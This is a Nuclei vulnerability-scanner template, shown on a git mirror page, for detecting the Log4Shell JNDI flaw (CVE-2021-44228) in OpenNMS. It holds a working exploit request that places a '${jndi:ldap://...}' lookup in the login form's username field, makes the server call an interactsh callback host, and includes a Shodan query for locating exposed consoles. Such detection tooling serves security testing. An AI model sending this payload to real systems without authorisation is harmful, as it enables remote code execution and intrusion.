daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml

67 lines
2.3 KiB
YAML
Raw Blame History

id: opennms-log4j-jndi-rce
info:
name: OpenNMS - JNDI Remote Code Execution (Apache Log4j)
author: johnk3r
severity: critical
description: |
OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
- https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: title:"OpenNMS Web Console"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
POST /opennms/j_spring_security_check HTTP/1.1
Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
extractors:
- type: kval
kval:
- interactsh_ip
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 490a00463044022012258aeac3908dbcd407eeb5a73335d3c728f1210f49e904e34f5dfa78805d0b0220665ebec241d8ee18d7d0ae9b1b284b02a767a3c888decd032bd6c42fcfa7a901:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink